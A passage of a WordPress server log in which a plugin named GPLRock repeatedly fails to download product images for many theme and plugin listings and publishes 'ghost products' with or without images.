pimp-creative-multipurpose-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/pimp---creative-multipurpose-theme-29867.webp for product pimp-creative-multipurpose-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:18:35 UTC] GPLRock WARNING: Image download failed for product pimp-creative-multipurpose-theme. URL: https://meldwp.com/wp-content/uploads/pimp---creative-multipurpose-theme-29867.webp [05-Apr-2026 12:18:35 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: pimp-creative-multipurpose-theme [05-Apr-2026 12:18:35 UTC] GPLRock: Image download failed for product florentine-responsive-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:37 UTC] GPLRock: Image download failed for product florentine-responsive-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:39 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/florentine---responsive-magazine-theme-11641.webp for product florentine-responsive-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:18:39 UTC] GPLRock: Image download failed for product florentine-responsive-magazine-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:42 UTC] GPLRock: Image download failed for product florentine-responsive-magazine-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/florentine---responsive-magazine-theme-11641.webp for product florentine-responsive-magazine-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:18:44 UTC] GPLRock WARNING: Image download failed for product florentine-responsive-magazine-theme. URL: https://meldwp.com/wp-content/uploads/florentine---responsive-magazine-theme-11641.webp [05-Apr-2026 12:18:46 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: florentine-responsive-magazine-theme [05-Apr-2026 12:18:48 UTC] GPLRock: Image download failed for product white-label-business-and-company-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:50 UTC] GPLRock: Image download failed for product white-label-business-and-company-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:52 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/white-label---business-and-company-theme-622.webp for product white-label-business-and-company-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:18:52 UTC] GPLRock: Image download failed for product white-label-business-and-company-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:54 UTC] GPLRock: Image download failed for product white-label-business-and-company-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/white-label---business-and-company-theme-622.webp for product white-label-business-and-company-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:18:57 UTC] GPLRock WARNING: Image download failed for product white-label-business-and-company-theme. URL: https://meldwp.com/wp-content/uploads/white-label---business-and-company-theme-622.webp [05-Apr-2026 12:18:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: white-label-business-and-company-theme [05-Apr-2026 12:18:57 UTC] GPLRock: Image download failed for product theblog-multi-concept-blog-portfolio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:18:59 UTC] GPLRock: Image download failed for product theblog-multi-concept-blog-portfolio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/theblog---multi-concept-blog--portfolio-26578.webp for product theblog-multi-concept-blog-portfolio after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:01 UTC] GPLRock: Image download failed for product theblog-multi-concept-blog-portfolio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:03 UTC] GPLRock: Image download failed for product theblog-multi-concept-blog-portfolio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:05 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/theblog---multi-concept-blog--portfolio-26578.webp for product theblog-multi-concept-blog-portfolio after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:05 UTC] GPLRock WARNING: Image download failed for product theblog-multi-concept-blog-portfolio. URL: https://meldwp.com/wp-content/uploads/theblog---multi-concept-blog--portfolio-26578.webp [05-Apr-2026 12:19:05 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: theblog-multi-concept-blog-portfolio [05-Apr-2026 12:19:05 UTC] GPLRock: Image download failed for product play-time-day-care-kindergarten-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:07 UTC] GPLRock: Image download failed for product play-time-day-care-kindergarten-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:10 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/play-time---day-care--kindergarten-wordpress-theme-3504.webp for product play-time-day-care-kindergarten-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:10 UTC] GPLRock: Image download failed for product play-time-day-care-kindergarten-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:12 UTC] GPLRock: Image download failed for product play-time-day-care-kindergarten-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:14 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/play-time---day-care--kindergarten-wordpress-theme-3504.webp for product play-time-day-care-kindergarten-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:14 UTC] GPLRock WARNING: Image download failed for product play-time-day-care-kindergarten-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/play-time---day-care--kindergarten-wordpress-theme-3504.webp [05-Apr-2026 12:19:14 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: play-time-day-care-kindergarten-wordpress-theme [05-Apr-2026 12:19:14 UTC] GPLRock: Image download failed for product ecotree-organic-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:16 UTC] GPLRock: Image download failed for product ecotree-organic-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecotree---organic-food-wordpress-theme-21295.webp for product ecotree-organic-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:18 UTC] GPLRock: Image download failed for product ecotree-organic-food-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:20 UTC] GPLRock: Image download failed for product ecotree-organic-food-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:23 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ecotree---organic-food-wordpress-theme-21295.webp for product ecotree-organic-food-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:23 UTC] GPLRock WARNING: Image download failed for product ecotree-organic-food-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ecotree---organic-food-wordpress-theme-21295.webp [05-Apr-2026 12:19:23 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ecotree-organic-food-wordpress-theme [05-Apr-2026 12:19:23 UTC] GPLRock: Image download failed for product regn-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:25 UTC] GPLRock: Image download failed for product regn-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/regn--multi-purpose-wordpress-theme-14028.webp for product regn-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:27 UTC] GPLRock: Image download failed for product regn-multi-purpose-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:29 UTC] GPLRock: Image download failed for product regn-multi-purpose-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/regn--multi-purpose-wordpress-theme-14028.webp for product regn-multi-purpose-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:31 UTC] GPLRock WARNING: Image download failed for product regn-multi-purpose-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/regn--multi-purpose-wordpress-theme-14028.webp [05-Apr-2026 12:19:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: regn-multi-purpose-wordpress-theme [05-Apr-2026 12:19:31 UTC] GPLRock: Image download failed for product moresa-startup-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:33 UTC] GPLRock: Image download failed for product moresa-startup-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:36 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moresa---startup-agency-wordpress-theme-7162.webp for product moresa-startup-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:36 UTC] GPLRock: Image download failed for product moresa-startup-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:38 UTC] GPLRock: Image download failed for product moresa-startup-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/moresa---startup-agency-wordpress-theme-7162.webp for product moresa-startup-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:40 UTC] GPLRock WARNING: Image download failed for product moresa-startup-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/moresa---startup-agency-wordpress-theme-7162.webp [05-Apr-2026 12:19:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: moresa-startup-agency-wordpress-theme [05-Apr-2026 12:19:40 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-inbio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:42 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-inbio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--inbio-8606.webp for product personal-portfolio-wordpress-theme-inbio after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:44 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-inbio (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:47 UTC] GPLRock: Image download failed for product personal-portfolio-wordpress-theme-inbio (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:49 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--inbio-8606.webp for product personal-portfolio-wordpress-theme-inbio after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:49 UTC] GPLRock WARNING: Image download failed for product personal-portfolio-wordpress-theme-inbio. URL: https://meldwp.com/wp-content/uploads/personal-portfolio-wordpress-theme--inbio-8606.webp [05-Apr-2026 12:19:49 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: personal-portfolio-wordpress-theme-inbio [05-Apr-2026 12:19:49 UTC] GPLRock: Image download failed for product jasy-equestrian-horse-riding-club-wordpress-theme-for-stables-ranches (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:51 UTC] GPLRock: Image download failed for product jasy-equestrian-horse-riding-club-wordpress-theme-for-stables-ranches (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jasy--equestrian--horse-riding-club-wordpress-theme-for-stables--ranches-13203.webp for product jasy-equestrian-horse-riding-club-wordpress-theme-for-stables-ranches after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:53 UTC] GPLRock: Image download failed for product jasy-equestrian-horse-riding-club-wordpress-theme-for-stables-ranches (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:55 UTC] GPLRock: Image download failed for product jasy-equestrian-horse-riding-club-wordpress-theme-for-stables-ranches (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:19:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/jasy--equestrian--horse-riding-club-wordpress-theme-for-stables--ranches-13203.webp for product jasy-equestrian-horse-riding-club-wordpress-theme-for-stables-ranches after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:19:57 UTC] GPLRock WARNING: Image download failed for product jasy-equestrian-horse-riding-club-wordpress-theme-for-stables-ranches. URL: https://meldwp.com/wp-content/uploads/jasy--equestrian--horse-riding-club-wordpress-theme-for-stables--ranches-13203.webp [05-Apr-2026 12:19:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: jasy-equestrian-horse-riding-club-wordpress-theme-for-stables-ranches [05-Apr-2026 12:20:14 UTC] GPLRock: Image download failed for product aeen-attorney-and-lawyer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:16 UTC] GPLRock: Image download failed for product aeen-attorney-and-lawyer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:18 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aeen---attorney-and-lawyer-wordpress-theme-6190.webp for product aeen-attorney-and-lawyer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:18 UTC] GPLRock: Image download failed for product aeen-attorney-and-lawyer-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:20 UTC] GPLRock: Image download failed for product aeen-attorney-and-lawyer-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:22 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/aeen---attorney-and-lawyer-wordpress-theme-6190.webp for product aeen-attorney-and-lawyer-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:22 UTC] GPLRock WARNING: Image download failed for product aeen-attorney-and-lawyer-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/aeen---attorney-and-lawyer-wordpress-theme-6190.webp [05-Apr-2026 12:20:22 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: aeen-attorney-and-lawyer-wordpress-theme [05-Apr-2026 12:20:23 UTC] GPLRock: Image download failed for product musicplay-music-dj-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:25 UTC] GPLRock: Image download failed for product musicplay-music-dj-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:27 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musicplay---music--dj-responsive-wordpress-theme-14842.webp for product musicplay-music-dj-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:27 UTC] GPLRock: Image download failed for product musicplay-music-dj-responsive-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:29 UTC] GPLRock: Image download failed for product musicplay-music-dj-responsive-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:31 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musicplay---music--dj-responsive-wordpress-theme-14842.webp for product musicplay-music-dj-responsive-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:31 UTC] GPLRock WARNING: Image download failed for product musicplay-music-dj-responsive-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/musicplay---music--dj-responsive-wordpress-theme-14842.webp [05-Apr-2026 12:20:31 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: musicplay-music-dj-responsive-wordpress-theme [05-Apr-2026 12:20:31 UTC] GPLRock: Image download failed for product bratis-digital-marketing-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:33 UTC] GPLRock: Image download failed for product bratis-digital-marketing-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:35 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bratis---digital-marketing-wordpress-theme--rtl-23663.webp for product bratis-digital-marketing-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:36 UTC] GPLRock: Image download failed for product bratis-digital-marketing-wordpress-theme-rtl (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:38 UTC] GPLRock: Image download failed for product bratis-digital-marketing-wordpress-theme-rtl (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:40 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/bratis---digital-marketing-wordpress-theme--rtl-23663.webp for product bratis-digital-marketing-wordpress-theme-rtl after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:40 UTC] GPLRock WARNING: Image download failed for product bratis-digital-marketing-wordpress-theme-rtl. URL: https://meldwp.com/wp-content/uploads/bratis---digital-marketing-wordpress-theme--rtl-23663.webp [05-Apr-2026 12:20:40 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: bratis-digital-marketing-wordpress-theme-rtl [05-Apr-2026 12:20:40 UTC] GPLRock: Image download failed for product snapcase-responsive-wordpress-photoblog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:42 UTC] GPLRock: Image download failed for product snapcase-responsive-wordpress-photoblog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:44 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snapcase---responsive-wordpress-photoblog-theme-4642.webp for product snapcase-responsive-wordpress-photoblog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:44 UTC] GPLRock: Image download failed for product snapcase-responsive-wordpress-photoblog-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:46 UTC] GPLRock: Image download failed for product snapcase-responsive-wordpress-photoblog-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:48 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/snapcase---responsive-wordpress-photoblog-theme-4642.webp for product snapcase-responsive-wordpress-photoblog-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:48 UTC] GPLRock WARNING: Image download failed for product snapcase-responsive-wordpress-photoblog-theme. URL: https://meldwp.com/wp-content/uploads/snapcase---responsive-wordpress-photoblog-theme-4642.webp [05-Apr-2026 12:20:48 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: snapcase-responsive-wordpress-photoblog-theme [05-Apr-2026 12:20:49 UTC] GPLRock: Image download failed for product eventica-event-calendar-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:51 UTC] GPLRock: Image download failed for product eventica-event-calendar-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:53 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventica---event-calendar--ecommerce-wordpress-theme-7292.webp for product eventica-event-calendar-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:53 UTC] GPLRock: Image download failed for product eventica-event-calendar-ecommerce-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:55 UTC] GPLRock: Image download failed for product eventica-event-calendar-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:57 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eventica---event-calendar--ecommerce-wordpress-theme-7292.webp for product eventica-event-calendar-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:20:57 UTC] GPLRock WARNING: Image download failed for product eventica-event-calendar-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/eventica---event-calendar--ecommerce-wordpress-theme-7292.webp [05-Apr-2026 12:20:57 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eventica-event-calendar-ecommerce-wordpress-theme [05-Apr-2026 12:20:57 UTC] GPLRock: Image download failed for product eldritch-epic-wordpress-theme-for-gaming-and-esports (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:20:59 UTC] GPLRock: Image download failed for product eldritch-epic-wordpress-theme-for-gaming-and-esports (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:01 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eldritch---epic-wordpress-theme-for-gaming-and-esports-10837.webp for product eldritch-epic-wordpress-theme-for-gaming-and-esports after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:21:02 UTC] GPLRock: Image download failed for product eldritch-epic-wordpress-theme-for-gaming-and-esports (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:04 UTC] GPLRock: Image download failed for product eldritch-epic-wordpress-theme-for-gaming-and-esports (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/eldritch---epic-wordpress-theme-for-gaming-and-esports-10837.webp for product eldritch-epic-wordpress-theme-for-gaming-and-esports after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:21:06 UTC] GPLRock WARNING: Image download failed for product eldritch-epic-wordpress-theme-for-gaming-and-esports. URL: https://meldwp.com/wp-content/uploads/eldritch---epic-wordpress-theme-for-gaming-and-esports-10837.webp [05-Apr-2026 12:21:06 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: eldritch-epic-wordpress-theme-for-gaming-and-esports [05-Apr-2026 12:21:06 UTC] GPLRock: Image downloaded successfully for product outmedia-outdoor-advertising-billboard-agency-wordpress-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2c7b252.webp [05-Apr-2026 12:21:06 UTC] GPLRock: Using pre-downloaded image for product outmedia-outdoor-advertising-billboard-agency-wordpress-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e2c7b252.webp [05-Apr-2026 12:21:06 UTC] GPLRock: Ghost product published with image - Product ID: outmedia-outdoor-advertising-billboard-agency-wordpress-theme [05-Apr-2026 12:21:07 UTC] GPLRock: Image download failed for product mobrepair-mobile-phone-repair-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:09 UTC] GPLRock: Image download failed for product mobrepair-mobile-phone-repair-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mobrepair---mobile-phone-repair-services-wordpress-theme-29664.webp for product mobrepair-mobile-phone-repair-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:21:11 UTC] GPLRock: Image download failed for product mobrepair-mobile-phone-repair-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:13 UTC] GPLRock: Image download failed for product mobrepair-mobile-phone-repair-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/mobrepair---mobile-phone-repair-services-wordpress-theme-29664.webp for product mobrepair-mobile-phone-repair-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:21:15 UTC] GPLRock WARNING: Image download failed for product mobrepair-mobile-phone-repair-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/mobrepair---mobile-phone-repair-services-wordpress-theme-29664.webp [05-Apr-2026 12:21:15 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: mobrepair-mobile-phone-repair-services-wordpress-theme [05-Apr-2026 12:21:15 UTC] GPLRock: Image download failed for product finwave-business-and-finance-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:17 UTC] GPLRock: Image download failed for product finwave-business-and-finance-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finwave---business-and-finance-wordpress-theme-29690.webp for product finwave-business-and-finance-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:21:20 UTC] GPLRock: Image download failed for product finwave-business-and-finance-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:22 UTC] GPLRock: Image download failed for product finwave-business-and-finance-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/finwave---business-and-finance-wordpress-theme-29690.webp for product finwave-business-and-finance-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:21:24 UTC] GPLRock WARNING: Image download failed for product finwave-business-and-finance-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/finwave---business-and-finance-wordpress-theme-29690.webp [05-Apr-2026 12:21:24 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: finwave-business-and-finance-wordpress-theme [05-Apr-2026 12:21:24 UTC] GPLRock: Image download failed for product musicbeat-music-bands-musicians-djs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:26 UTC] GPLRock: Image download failed for product musicbeat-music-bands-musicians-djs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musicbeat-music-bands-musicians--djs-wordpress-theme-17708.webp for product musicbeat-music-bands-musicians-djs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:21:28 UTC] GPLRock: Image download failed for product musicbeat-music-bands-musicians-djs-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:30 UTC] GPLRock: Image download failed for product musicbeat-music-bands-musicians-djs-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [05-Apr-2026 12:21:33 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/musicbeat-music-bands-musicians--djs-wordpress-theme-17708.webp for product musicbeat-music-bands-musicians-djs-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [05-Apr-2026 12:21:33 UTC] GPLRock WARNING: Image download failed for product musicbeat-music-bands-musicians-djs-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/musicbeat-music-bands-musicians--djs-wordpress-theme-17708.webp [05-Apr-2026 12:21:33 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: musicbeat-music-bands-musicians-djs-wordpress-theme [05-Apr-2026 12:22:12 UTC] GPLRock: Image downloaded successfully for product jannah-news-newspaper-magazine-news-amp-buddypress (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-009db29e.avif [05-Apr-2026 12:22:12 UTC] GPLRock: Using pre-downloaded image for product jannah-news-newspaper-magazine-news-amp-buddypress: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-009db29e.avif [05-Apr-2026 12:22:12 UTC] GPLRock: Ghost product published with image - Product ID: jannah-news-newspaper-magazine-news-amp-buddypress [05-Apr-2026 12:22:13 UTC] GPLRock: Image downloaded successfully for product wordfence-security-premium (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1363c0b0.jpg [05-Apr-2026 12:22:14 UTC] GPLRock: Using pre-downloaded image for product wordfence-security-premium: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1363c0b0.jpg [05-Apr-2026 12:22:14 UTC] GPLRock: Ghost product published with image - Product ID: wordfence-security-premium [05-Apr-2026 12:22:16 UTC] GPLRock: Image downloaded successfully for product external-importer-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bcb8aa5a.png [05-Apr-2026 12:22:16 UTC] GPLRock: Using pre-downloaded image for product external-importer-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-bcb8aa5a.png [05-Apr-2026 12:22:16 UTC] GPLRock: Ghost product published with image - Product ID: external-importer-pro [05-Apr-2026 12:22:18 UTC] GPLRock: Image downloaded successfully for product elegant-themes-divi-wordpress-theme-layouts (attempt 1) to: 